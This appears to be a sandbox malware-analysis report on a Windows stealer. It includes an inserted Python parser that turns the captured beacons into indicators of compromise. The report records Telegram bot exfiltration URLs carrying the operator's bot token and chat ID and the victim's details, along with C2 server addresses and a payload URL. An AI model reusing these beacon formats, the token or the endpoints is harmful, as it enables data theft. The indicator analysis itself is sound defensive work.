https://13.231.21.109:443 | 0% | Avira URL Cloud | safe
https://192.99.196.191:443 | 100% | Avira URL Cloud | malware
http://185.119.118.59:80802 | 1% | Virustotal | Browse
https://e483612b93e055308d0c85f365c474ee.serveo.net/ | 0% | Avira URL Cloud | safe
http://66.42.56.128:80 | 100% | Avira URL Cloud | malware
https://64.227.21.98:443 | 0% | Avira URL Cloud | safe
http://23.224.102.6:8001 | 1% | Virustotal | Browse
http://185.119.118.59:8080/get | 0% | Avira URL Cloud | safe
https://13.231.21.109:443 | 0% | Virustotal | Browse
http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user | 0% | Avira URL Cloud | safe
http://129.151.109.160:8080 | 0% | Avira URL Cloud | safe
http://66.42.56.128:80 | 9% | Virustotal | Browse
http://127.0.0.1:6787/ | 0% | Avira URL Cloud | safe
http://82.147.85 | 0% | Avira URL Cloud | safe
http://82.147.85.194/byte/@jokerbot880901.txt | 100% | Avira URL Cloud | malware
http://129.151.109.160:8080 | 3% | Virustotal | Browse
http://23.248.176.37:180 | 0% | Avira URL Cloud | safe
https://64.227.21.98:443 | 0% | Virustotal | Browse
http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr | 0% | Avira URL Cloud | safe
http://82.147.85 | 0% | Virustotal | Browse
http://185.119.118.59 | 0% | Avira URL Cloud | safe
http://127.0.0.1: | 0% | Avira URL Cloud | safe
http://45.61.136.52:80 | 0% | Avira URL Cloud | safe
http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net | 0% | Avira URL Cloud | safe
http://185.119.118.59:8080/get | 1% | Virustotal | Browse
http://23.248.176.37:180 | 1% | Virustotal | Browse
http://185.119.118.59:8080/hkLYW_user | 0% | Avira URL Cloud | safe
http://45.61.136.13:80 | 0% | Avira URL Cloud | safe
http://45.61.136.52:80 | 0% | Virustotal | Browse
http://154.26.128.6:80 | 0% | Avira URL Cloud | safe
http://212.6.44.53:8080 | 0% | Avira URL Cloud | safe
http://185.217.98.121:80 | 100% | Avira URL Cloud | malware
https://44.228.161.50:443 | 100% | Avira URL Cloud | malware
http://212.6.44.53:8080 | 1% | Virustotal | Browse
http://104.248.208.221:80 | 0% | Avira URL Cloud | safe
https://164.90.185.9:443 | 100% | Avira URL Cloud | malware
https://44.228.161.50:443 | 2% | Virustotal | Browse
http://185.119.118.59 | 0% | Virustotal | Browse
http://104.248.208.221:80 | 1% | Virustotal | Browse
http://154.26.128.6:80 | 0% | Virustotal | Browse
http://18.228.80.130:80 | 100% | Avira URL Cloud | malware
http://185.217.98.121:80 | 15% | Virustotal | Browse
http://185.217.98.121:8080 | 100% | Avira URL Cloud | malware
http://193.142.58.127:80Pk | 0% | Avira URL Cloud | safe
https://164.90.185.9:443 | 9% | Virustotal | Browse
https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net | 0% | Avira URL Cloud | safe
https://e483612b93e055308d0c85f365c474ee.serveo.net | 0% | Avira URL Cloud | safe
http://45.61.136.13:80 | 2% | Virustotal | Browse
http://144.126.132.141:8080 | 0% | Avira URL Cloud | safe
http://pesterbdd.com/i? | 100% | Avira URL Cloud | malware
https://18.178.28.151:443 | 0% | Avira URL Cloud | safe
http://82.147.85.194/byte/ | 100% | Avira URL Cloud | malware
http://18.228.80.130:80 | 11% | Virustotal | Browse
http://127.0.0.1:6787/ing=no | 0% | Avira URL Cloud | safe
http://149.88.44.159:80 | 0% | Avira URL Cloud | safe
http://82.147.85.194 | 0% | Avira URL Cloud | safe
https://192.99.196.191:443 | 4% | Virustotal | Browse
http://185.217.98.121:8080 | 11% | Virustotal | Browse
https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/ | 0% | Avira URL Cloud | safe
https://185.217.98.121:443 | 100% | Avira URL Cloud | malware
http://116.202.101.219:8080 | 100% | Avira URL Cloud | malware
https://api.tele | 0% | Avira URL Cloud | safe
http://127.0.0.1:18772/handleOpenWSR?r= | 0% | Avira URL Cloud | safe
http://206.189.109.146:80 | 100% | Avira URL Cloud | malware
http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72% | 0% | Avira URL Cloud | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
serveo.net | 138.68.79.95 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML | false | | high
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML | false | | high
http://ip-api.com/line?fields=query,country | false | | high
http://82.147.85.194/byte/@jokerbot880901.txt | false | Avira URL Cloud: malware | unknown
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML | false | | high
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML | false | | high
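The sendMessage URLs above carry the whole beacon in the request: the bot token in the path, the operator's chat_id, an HTML-formatted victim summary in `text`, and, for the report upload, an `inline_keyboard` whose Download button points at the server holding the stolen archive. The parser below is an added example, not part of the Joe Sandbox report or of the malware; it decodes the two URLs exactly as recorded in this table into the identifiers a responder would block or report (bot id, chat_id, tunnel hostname, report server). The only inputs are those two URLs; no other values are assumed.

```python
"""Decode the Telegram Bot API beacons recorded in this report into IOCs.

Added example for this report; not code from Joe Sandbox or from the sample.
The two URLs are copied from the network table above (bot token and chat_id
are the attacker's values as captured).
"""
import json
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import parse_qs, urlparse

HEARTBEAT_URL = (
    "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"
    "?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A"
    "%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A"
    "%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A"
    "%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A"
    "%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A"
    "%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A"
    "&parse_mode=HTML"
)
BEACON_URL = (
    "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"
    "?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A"
    "%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A"
    "%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A"
    "%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A"
    "%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A"
    "%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A"
    "&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A"
    "%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C"
    "%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3D"
    "http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D"
    "&parse_mode=HTML"
)

BOT_PATH = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(\w+)$")   # /bot<id>:<token>/<method>
FIELD_LINE = re.compile(r"^<b>([^<]+?):</b>\s*(.*)$")          # "<b>Key:</b> value" lines
HTML_TAG = re.compile(r"</?[a-z]+>")
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_beacon(url: str) -> Dict:
    """Split a sendMessage URL into bot id/token, chat_id, hashtags, victim fields and buttons."""
    parts = urlparse(url)
    if parts.hostname != "api.telegram.org":
        raise ValueError("not a Telegram Bot API URL")
    m = BOT_PATH.match(parts.path)
    if not m:
        raise ValueError("no bot token in path")
    bot_id, token, method = m.groups()
    query = parse_qs(parts.query)          # percent-decodes every parameter once
    text = query.get("text", [""])[0]
    fields: Dict[str, str] = {}
    tags: List[str] = []
    for line in text.splitlines():
        fm = FIELD_LINE.match(line)
        if fm:
            fields[fm.group(1)] = HTML_TAG.sub("", fm.group(2)).strip()
        else:
            tags.extend(re.findall(r"#\w+", line))
    buttons: List[Tuple[str, str]] = []
    if "reply_markup" in query:
        markup = json.loads(query["reply_markup"][0])
        for row in markup.get("inline_keyboard", []):
            buttons.extend((b.get("text", ""), b.get("url", "")) for b in row)
    return {"bot_id": bot_id, "token": token, "method": method,
            "chat_id": query.get("chat_id", [""])[0],
            "tags": tags, "fields": fields, "buttons": buttons}


def network_iocs(beacon: Dict) -> Set[str]:
    """Hosts the beacon points at (tunnel endpoint, report server), following r= parameters."""
    hosts: Set[str] = set()
    pending = [v for v in beacon["fields"].values() if v.startswith("http")]
    pending += [u for _, u in beacon["buttons"] if u.startswith("http")]
    while pending:
        p = urlparse(pending.pop())
        if p.hostname and p.hostname not in LOOPBACK:
            hosts.add(p.hostname)
        for values in parse_qs(p.query).values():
            pending.extend(v for v in values if v.startswith("http"))
    return hosts


if __name__ == "__main__":
    for url in (HEARTBEAT_URL, BEACON_URL):
        b = parse_beacon(url)
        print(b["tags"], "bot", b["bot_id"], "chat", b["chat_id"], b["fields"], sorted(network_iocs(b)))
```

Two details of the format are worth noting for response work. The "Open" button targets 127.0.0.1:18772 with the real download URL in an `r=` parameter, so a naive hostname extraction sees only loopback; the parser follows nested `http` values in the query string to recover 185.119.118.59. And because both beacons share one bot id and chat_id, those two values, together with the serveo.net tunnel hostnames, identify the operator across victims and are what to hand to Telegram abuse and to proxy block lists.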
URLs found in memory or binary data
Name | Source | Malicious | Antivirus Detection | Reputation

URL: http://193.142.58.127:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 7%, Virustotal, Browse; Avira URL Cloud: safe
Reputation: unknown

URL: http://www.microsoft.co(=
Source: powershell.exe, 00000001.00000002.1717242084.0000000007819000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: low

URL: http://216.250.190.139:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 8%, Virustotal, Browse; Avira URL Cloud: malware
Reputation: unknown

URL: https://duckduckgo.com/chrome_newtab
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://duckduckgo.com/ac/?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: http://23.224.102.6:8001
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 1%, Virustotal, Browse; Avira URL Cloud: safe
Reputation: unknown

URL: https://api.telegram.org/bot
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://e2111f95f52ba8be6b2d3394e38b1722.se
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

URL: http://185.119.118.59:8080
Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 1%, Virustotal, Browse; Avira URL Cloud: safe
Reputation: unknown

URL: http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

URL: http://107.161.20.142:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 3%, Virustotal, Browse; Avira URL Cloud: safe
Reputation: unknown

URL: http://185.119.118.59:80802
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 1%, Virustotal, Browse; Avira URL Cloud: safe
Reputation: unknown

URL: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

URL: https://13.231.21.109:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
Reputation: unknown

URL: https://192.99.196.191:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 4%, Virustotal, Browse; Avira URL Cloud: malware
Reputation: unknown

URL: https://e483612b93e055308d0c85f365c474ee.serveo.net/
Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000021.00000002.4113726250.0000029260842000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

URL: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: http://66.42.56.128:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 9%, Virustotal, Browse; Avira URL Cloud: malware
Reputation: unknown

URL: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: http://ip-api.com
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://64.227.21.98:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
Reputation: unknown

URL: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997F9F000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A001B2000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B62000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1912000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
                                                high
                                                http://185.119.118.59:8080/getvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 1%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_uservkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://129.151.109.160:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 3%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://127.0.0.1:6787/vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, hahahahaha.txt.18.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://82.147.85jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                low
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmptrue
                                                • URL Reputation: malware
                                                unknown
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01A44000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D17F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
